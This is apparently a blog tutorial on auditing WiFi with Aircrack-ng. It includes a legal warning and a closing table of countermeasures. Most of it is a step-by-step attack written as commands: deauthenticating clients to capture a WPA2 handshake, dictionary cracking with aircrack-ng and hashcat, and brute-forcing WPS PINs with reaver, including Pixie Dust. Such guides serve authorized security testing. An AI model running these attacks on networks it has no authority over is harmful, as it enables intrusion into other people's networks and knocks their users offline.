← Back to home
WiFi WPA2 Aircrack-ng Wireless AuditorΓ­a

Wireless Network Auditing

May 15, 2022

WiFi security auditing guide with Aircrack-ng: WPA2 handshake capture, dictionary cracking and WPS attacks.

Legal Warning: Only audit networks you own or have explicit written permission to test.

1. Enable Monitor Mode

airmon-ng check kill
airmon-ng start wlan0   # Creates wlan0mon

2. Network Discovery

airodump-ng wlan0mon
# Shows: BSSID, Channel, Encryption, SSID, Connected clients

3. Capture WPA2 Handshake

airodump-ng -c [CH] --bssid [AP_MAC] -w capture wlan0mon
# Force deauth to capture re-handshake:
aireplay-ng -0 5 -a [AP_MAC] -c [CLIENT_MAC] wlan0mon

4. Crack the Handshake

# Aircrack-ng (CPU):
aircrack-ng -w rockyou.txt capture-01.cap

# Hashcat (GPU β€” much faster):
hcxpcapngtool -o hash.hc22000 capture-01.cap
hashcat -a 0 -m 22000 hash.hc22000 rockyou.txt

5. WPS Attack

wash -i wlan0mon              # Find WPS-enabled APs
reaver -i wlan0mon -b [AP_MAC] -vv     # Brute force PIN
reaver -i wlan0mon -b [AP_MAC] -vv -K 1  # Pixie Dust

6. Countermeasures

MeasureDescription
Use WPA3Most secure protocol β€” uses SAE instead of PSK
Long random passphrase20+ chars β€” impossible to dictionary-crack
Disable WPSWPS 8-digit PIN is vulnerable to brute force
Guest networkIsolate IoT devices and visitors